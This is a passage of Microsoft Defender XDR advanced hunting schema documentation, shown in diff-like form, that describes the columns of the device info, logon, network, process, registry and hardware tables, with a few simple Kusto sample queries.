-| `ExclusionReason` | `string` | Indicates the reason for device exclusion |
-| `ExposureLevel` | `string` | The device's level of vulnerability to exploitation based on its exposure score; can be: Low, Medium, High |
-| `AssetValue`| `string` | Priority or value assigned to the device in relation to its importance in computing the organization's exposure score; can be: Low, Normal (Default), High |
-| `DeviceManualTags` | `string` | Device tags created manually using the portal UI or public API |
-| `DeviceDynamicTags` | `string` | Device tags added and removed dynamically based on dynamic rules |
-| `ConnectivityType` | `string` | Type of connectivity from the device to the cloud |
-| `HostDeviceId` | `string` | Device ID of the device running Windows Subsystem for Linux |
-| `AzureResourceId` | `string` | Unique identifier of the Azure resource associated with the device |
-----
-The `DeviceInfo` table provides device information based on periodic reports or signals (heartbeats) from a device. Complete reports are sent every hour and every time a change happens to a previous heartbeat.
-
-You can use the following sample query to get the latest state of a device:
-
-```kusto
-// Get latest information on user/device
-DeviceInfo
-| where DeviceName == "example" and isnotempty(OSPlatform)
-| summarize arg_max(Timestamp, *) by DeviceId
-```
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicelogonevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicelogonevents-table.md
- Title: DeviceLogonEvents table in the advanced hunting schema
-description: Learn about authentication or sign-in events in the DeviceLogonEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceLogonEvents
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint---
-The `DeviceLogonEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about user logons and other authentication events on devices. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ActionType` | `string` |Type of activity that triggered the event |
-| `LogonType` | `string` | Type of logon session, specifically:<br><br> - **Interactive** - User physically interacts with the device using the local keyboard and screen<br><br> - **Remote interactive (RDP) logons** - User interacts with the device remotely using Remote Desktop, Terminal Services, Remote Assistance, or other RDP clients<br><br> - **Network** - Session initiated when the device is accessed using PsExec or when shared resources on the device, such as printers and shared folders, are accessed<br><br> - **Batch** - Session initiated by scheduled tasks<br><br> - **Service** - Session initiated by services as they start<br> |
-| `AccountDomain` | `string` | Domain of the account |
-| `AccountName` | `string` | User name of the account |
-| `AccountSid` | `string` | Security Identifier (SID) of the account |
-| `Protocol` | `string` | Protocol used during the communication |
-| `FailureReason` | `string` | Information explaining why the recorded action failed |
-| `IsLocalAdmin` | `boolean` | Boolean indicator of whether the user is a local administrator on the device |
-| `LogonId` | `long` | Identifier for a logon session. This identifier is unique on the same device only between restarts. |
-| `RemoteDeviceName` | `string` | Name of the device that performed a remote operation on the affected device. Depending on the event being reported, this name could be a fully-qualified domain name (FQDN), a NetBIOS name or a host name without domain information. |
-| `RemoteIP` | `string` | IP address of the device from which the logon attempt was performed |
-| `RemoteIPType` | `string` | Type of IP address, for example Public, Private, Reserved, Loopback, Teredo, FourToSixMapping, and Broadcast |
-| `RemotePort` | `int` | TCP port on the remote device that was being connected to |
-| `InitiatingProcessAccountDomain` | `string` | Domain of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountName` | `string` | User name of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountSid` | `string` | Security Identifier (SID) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountUpn` | `string` | User principal name (UPN) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountObjectId` | `string` | Microsoft Entra object ID of the user account that ran the process responsible for the event |
-| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |
-| `InitiatingProcessTokenElevation` | `string` | Token type indicating the presence or absence of User Access Control (UAC) privilege elevation applied to the process that initiated the event |
-| `InitiatingProcessSHA1` | `string` | SHA-1 hash of the process (image file) that initiated the event |
-| `InitiatingProcessSHA256` | `string` | SHA-256 hash of the process (image file) that initiated the event. This field is usually not populated - use the SHA1 column when available. |
-| `InitiatingProcessMD5` | `string` | MD5 hash of the process (image file) that initiated the event |
-| `InitiatingProcessFileName` | `string` | Name of the process that initiated the event |
-| `InitiatingProcessFileSize` | `long` | Size of the file that ran the process responsible for the event |
-| `InitiatingProcessVersionInfoCompanyName` | `string` | Company name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductName` | `string` | Product name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductVersion` | `string` | Product version from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoFileDescription` | `string` | Description from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessId` | `long` | Process ID (PID) of the process that initiated the event |
-| `InitiatingProcessCommandLine` | `string` | Command line used to run the process that initiated the event |
-| `InitiatingProcessCreationTime` | `datetime` | Date and time when the process that initiated the event was started |
-| `InitiatingProcessFolderPath` | `string` | Folder containing the process (image file) that initiated the event |
-| `InitiatingProcessParentId` | `long` | Process ID (PID) of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentFileName` | `string` | Name or full path of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentCreationTime` | `datetime` | Date and time when the parent of the process responsible for the event was started |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AppGuardContainerId` | `string` | Identifier for the virtualized container used by Application Guard to isolate browser activity |
-| `AdditionalFields` | `string` | Additional information about the event in JSON array format |
-
-> [!NOTE]
-> The collection of DeviceLogonEvents is not supported on Windows 7 or Windows Server 2008R2 devices onboarded to Defender for Endpoint. We recommend upgrading to a more recent operating system for optimal visibility into user logon activity.
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicenetworkevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicenetworkevents-table.md
- Title: DeviceNetworkEvents table in the advanced hunting schema
-description: Learn about network connection events you can query from the DeviceNetworkEvents table of the advanced hunting schema
-
-ms.pagetype: security
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/11/2024--
-# DeviceNetworkEvents
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint---
-The `DeviceNetworkEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about network connections and related events. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |
-| `RemoteIP` | `string` | IP address that was being connected to |
-| `RemotePort` | `int` | TCP port on the remote device that was being connected to |
-| `RemoteUrl` | `string` | URL or fully qualified domain name (FQDN) that was being connected to |
-| `LocalIP` | `string` | Source IP, or the IP address where the communication came from |
-| `LocalPort` | `int` | TCP port on the local device used during communication |
-| `Protocol` | `string` | Protocol used during the communication |
-| `LocalIPType` | `string` | Type of IP address, for example Public, Private, Reserved, Loopback, Teredo, FourToSixMapping, and Broadcast |
-| `RemoteIPType` | `string` | Type of IP address, for example Public, Private, Reserved, Loopback, Teredo, FourToSixMapping, and Broadcast |
-| `InitiatingProcessSHA1` | `string` | SHA-1 of the process (image file) that initiated the event |
-| `InitiatingProcessSHA256` | `string` | SHA-256 of the process (image file) that initiated the event. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `InitiatingProcessMD5` | `string` | MD5 hash of the process (image file) that initiated the event |
-| `InitiatingProcessFileName` | `string` | Name of the process that initiated the event |
-| `InitiatingProcessFileSize` | `long` | Size of the file that ran the process responsible for the event |
-| `InitiatingProcessVersionInfoCompanyName` | `string` | Company name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductName` | `string` | Product name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductVersion` | `string` | Product version from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoFileDescription` | `string` | Description from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessId` | `long` | Process ID (PID) of the process that initiated the event |
-| `InitiatingProcessCommandLine` | `string` | Command line used to run the process that initiated the event |
-| `InitiatingProcessCreationTime` | `datetime` | Date and time when the process that initiated the event was started |
-| `InitiatingProcessFolderPath` | `string` | Folder containing the process (image file) that initiated the event |
-| `InitiatingProcessParentFileName` | `string` | Name of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentId` | `long` | Process ID (PID) of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentCreationTime` | `datetime` | Date and time when the parent of the process responsible for the event was started |
-| `InitiatingProcessAccountDomain` | `string` | Domain of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountName` | `string` | User name of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountSid` | `string` | Security Identifier (SID) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountUpn` | `string` | User principal name (UPN) of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID UPN of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountObjectId` | `string` | Microsoft Entra object ID of the user account that ran the process responsible for the event |
-| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |
-| `InitiatingProcessTokenElevation` | `string` | Token type indicating the presence or absence of User Access Control (UAC) privilege elevation applied to the process that initiated the event |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AppGuardContainerId` | `string` | Identifier for the virtualized container used by Application Guard to isolate browser activity |
-| `AdditionalFields` | `string` | Additional information about the event in JSON array format |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicenetworkinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicenetworkinfo-table.md
- Title: DeviceNetworkInfo table in the advanced hunting schema
-description: Learn about network configuration information in the DeviceNetworkInfo table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceNetworkInfo
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint---
-The `DeviceNetworkInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about networking configuration of machines, including network adapters, IP and MAC addresses, and connected networks or domains. Use this reference to construct queries that return information from this table.
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `NetworkAdapterName` | `string` | Name of the network adapter |
-| `MacAddress` | `string` | MAC address of the network adapter |
-| `NetworkAdapterType` | `string` | Network adapter type. For the possible values, refer to [this enumeration](/dotnet/api/system.net.networkinformation.networkinterfacetype). |
-| `NetworkAdapterStatus` | `string` | Operational status of the network adapter. For the possible values, refer to [this enumeration](/dotnet/api/system.net.networkinformation.operationalstatus). |
-| `TunnelType` | `string` | Tunneling protocol, if the interface is used for this purpose, for example 6to4, Teredo, ISATAP, PPTP, SSTP, and SSH |
-| `ConnectedNetworks` | `string` | Networks that the adapter is connected to. Each JSON element in the array contains the network name, category (public, private or domain), a description, and a flag indicating if it's connected publicly to the internet. |
-| `DnsAddresses` | `string` | DNS server addresses in JSON array format |
-| `IPv4Dhcp` | `string` | IPv4 address of DHCP server |
-| `IPv6Dhcp` | `string` | IPv6 address of DHCP server |
-| `DefaultGateways` | `string` | Default gateway addresses in JSON array format |
-| `IPAddresses` | `string` | JSON array containing all the IP addresses assigned to the adapter, along with their respective subnet prefix and IP address space, such as public, private, or link-local |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `NetworkAdapterVendor` | `string` | Name of the manufacturer or vendor of the network adapter |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Deviceprocessevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-deviceprocessevents-table.md
- Title: DeviceProcessEvents table in the advanced hunting schema
-description: Learn about the process spawning or creation events in the DeviceProcessEventstable of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/11/2024--
-# DeviceProcessEvents
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint---
-The `DeviceProcessEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about process creation and related events. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |
-| `FileName` | `string` | Name of the file that the recorded action was applied to |
-| `FolderPath` | `string` | Folder containing the file that the recorded action was applied to |
-| `SHA1` | `string` | SHA-1 of the file that the recorded action was applied to |
-| `SHA256` | `string` | SHA-256 of the file that the recorded action was applied to. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `MD5` | `string` | MD5 hash of the file that the recorded action was applied to |
-| `FileSize` | `long` | Size of the file in bytes |
-| `ProcessVersionInfoCompanyName` | `string` | Company name from the version information of the newly created process |
-| `ProcessVersionInfoProductName` | `string` | Product name from the version information of the newly created process |
-| `ProcessVersionInfoProductVersion` | `string` | Product version from the version information of the newly created process |
-| `ProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the newly created process |
-| `ProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the newly created process |
-| `ProcessVersionInfoFileDescription` | `string` | Description from the version information of the newly created process |
-| `ProcessId` | `long` | Process ID (PID) of the newly created process |
-| `ProcessCommandLine` | `string` | Command line used to create the new process |
-| `ProcessIntegrityLevel` | `string` | Integrity level of the newly created process. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet downloaded. These integrity levels influence permissions to resources. |
-| `ProcessTokenElevation` | `string` | Indicates the type of token elevation applied to the newly created process. Possible values: TokenElevationTypeLimited (restricted), TokenElevationTypeDefault (standard), and TokenElevationTypeFull (elevated) |
-| `ProcessCreationTime` | `datetime` | Date and time the process was created |
-| `AccountDomain` | `string` | Domain of the account |
-| `AccountName` | `string` | User name of the account; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account might be shown instead |
-| `AccountSid` | `string` | Security Identifier (SID) of the account |
-| `AccountUpn` | `string` | User principal name (UPN) of the account; if the device is registered in Microsoft Entra ID, the Entra ID UPN of the account might be shown instead |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `LogonId` | `long` | Identifier for a logon session. This identifier is unique on the same device only between restarts. |
-| `InitiatingProcessAccountDomain` | `string` | Domain of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountName` | `string` | User name of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountSid` | `string` | Security Identifier (SID) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountUpn` | `string` | User principal name (UPN) of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID UPN of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountObjectId` | `string` | Microsoft Entra object ID of the user account that ran the process responsible for the event |
-| `InitiatingProcessLogonId` | `long` | Identifier for a logon session of the process that initiated the event. This identifier is unique on the same device only between restarts. |
-| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |
-| `InitiatingProcessTokenElevation` | `string` | Token type indicating the presence or absence of User Access Control (UAC) privilege elevation applied to the process that initiated the event |
-| `InitiatingProcessSHA1` | `string` | SHA-1 hash of the process (image file) that initiated the event |
-| `InitiatingProcessSHA256` | `string` | SHA-256 of the process (image file) that initiated the event. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `InitiatingProcessMD5` | `string` | MD5 hash of the process (image file) that initiated the event |
-| `InitiatingProcessFileName` | `string` | Name of the process that initiated the event |
-| `InitiatingProcessFileSize` | `long` | Size of the file that ran the process responsible for the event |
-| `InitiatingProcessVersionInfoCompanyName` | `string` | Company name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductName` | `string` | Product name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductVersion` | `string` | Product version from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoFileDescription` | `string` | Description from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessId` | `long` | Process ID (PID) of the process that initiated the event |
-| `InitiatingProcessCommandLine` | `string` | Command line used to run the process that initiated the event |
-| `InitiatingProcessCreationTime` | `datetime` | Date and time when the process that initiated the event was started |
-| `InitiatingProcessFolderPath` | `string` | Folder containing the process (image file) that initiated the event |
-| `InitiatingProcessParentId` | `long` | Process ID (PID) of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentFileName` | `string` | Name of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentCreationTime` | `datetime` | Date and time when the parent of the process responsible for the event was started |
-| `InitiatingProcessSignerType` | `string` | Type of file signer of the process (image file) that initiated the event |
-| `InitiatingProcessSignatureStatus` | `string` | Information about the signature status of the process (image file) that initiated the event |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AppGuardContainerId` | `string` | Identifier for the virtualized container used by Application Guard to isolate browser activity |
-| `AdditionalFields` | `string` | Additional information about the event in JSON array format |
--
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Deviceregistryevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-deviceregistryevents-table.md
- Title: DeviceRegistryEvents table in the advanced hunting schema
-description: Learn about registry events you can query from the DeviceRegistryEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/11/2024--
-# DeviceRegistryEvents
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-The `DeviceRegistryEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about the creation and modification of registry entries. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |
-| `RegistryKey` | `string` | Registry key that the recorded action was applied to |
-| `RegistryValueType` | `string` | Data type, such as binary or string, of the registry value that the recorded action was applied to |
-| `RegistryValueName` | `string` | Name of the registry value that the recorded action was applied to |
-| `RegistryValueData` | `string` | Data of the registry value that the recorded action was applied to |
-| `PreviousRegistryKey` | `string` | Original registry key of the registry value before it was modified |
-| `PreviousRegistryValueName` | `string` | Original name of the registry value before it was modified |
-| `PreviousRegistryValueData` | `string` | Original data of the registry value before it was modified |
-| `InitiatingProcessAccountDomain` | `string` | Domain of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountName` | `string` | User name of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountSid` | `string` | Security Identifier (SID) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountUpn` | `string` | User principal name (UPN) of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID UPN of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountObjectId` | `string` | Microsoft Entra object ID of the user account that ran the process responsible for the event |
-| `InitiatingProcessSHA1` | `string` | SHA-1 of the process (image file) that initiated the event |
-| `InitiatingProcessSHA256` | `string` | SHA-256 of the process (image file) that initiated the event. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `InitiatingProcessMD5` | `string` | MD5 hash of the process (image file) that initiated the event |
-| `InitiatingProcessFileName` | `string` | Name of the process that initiated the event |
-| `InitiatingProcessFileSize` | `long` | Size of the file that ran the process responsible for the event |
-| `InitiatingProcessVersionInfoCompanyName` | `string` | Company name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductName` | `string` | Product name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductVersion` | `string` | Product version from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoFileDescription` | `string` | Description from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessId` | `long` | Process ID (PID) of the process that initiated the event |
-| `InitiatingProcessCommandLine` | `string` | Command line used to run the process that initiated the event |
-| `InitiatingProcessCreationTime` | `datetime` | Date and time when the process that initiated the event was started |
-| `InitiatingProcessFolderPath` | `string` | Folder containing the process (image file) that initiated the event |
-| `InitiatingProcessParentId` | `long` | Process ID (PID) of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentFileName` | `string` | Name of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentCreationTime` | `datetime` | Date and time when the parent of the process responsible for the event was started |
-| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |
-| `InitiatingProcessTokenElevation` | `string` | Token type indicating the presence or absence of User Access Control (UAC) privilege elevation applied to the process that initiated the event |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AppGuardContainerId` | `string` | Identifier for the virtualized container used by Application Guard to isolate browser activity |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicetvmhardwarefirmware Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvmhardwarefirmware-table.md
- Title: DeviceTvmHardwareFirmware table in the advanced hunting schema
-description: Learn about the DeviceTvmHardwareFirmware table in the advanced hunting schema, which includes information on devices like processor, BIOS, and others, as checked in threat and vulnerability management in Microsoft Defender XDR.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 12/29/2023--
-# DeviceTvmHardwareFirmware
---
-**Applies to:**
-- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The `DeviceTvmHardwareFirmware` table in the advanced hunting schema contains hardware and firmware information of devices as checked by [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt). The information includes the system model, processor, and BIOS, among others.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ComponentType` | `string` | Type of hardware or firmware component |
-| `Manufacturer` | `string` | Manufacturer of hardware or firmware component |
-| `ComponentName` | `string` | Name of hardware or firmware component |
-| `ComponentFamily` | `string` | Component family or class, a grouping of components that have similar features or characteristics as determined by the manufacturer |
-| `ComponentVersion` | `string` | Component version (for example, BIOS version) |
-| `AdditionalFields` | `dynamic` | Additional information about the components in JSON array format |
-
-You can try the following sample queries to use the information available in the `DeviceTvmHardwareFirmware` table:
-
-```kusto
-// Count the number of Lenovo devices
-DeviceTvmHardwareFirmware
-| where ComponentType == "Hardware" and Manufacturer == "lenovo"
-| summarize count()
-```
-
-```kusto
-// Find all devices with a specific BIOS version, replace ComponentVersion with what you are looking for
-DeviceTvmHardwareFirmware
-| where ComponentType == "Bios" and ComponentVersion contains "N2VET29W"
-|project DeviceId, DeviceName
-```
-
-## Related topics
--- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview of Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Advanced Hunting Devicetvminfogathering Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvminfogathering-table.md
- Title: DeviceTvmInfoGathering table in the advanced hunting schema
-description: Learn about the assessment events including the status of various configurations and attack surface area states of devices in the DeviceTvmInfoGathering table of the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 12/29/2023--
-# DeviceTvmInfoGathering
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
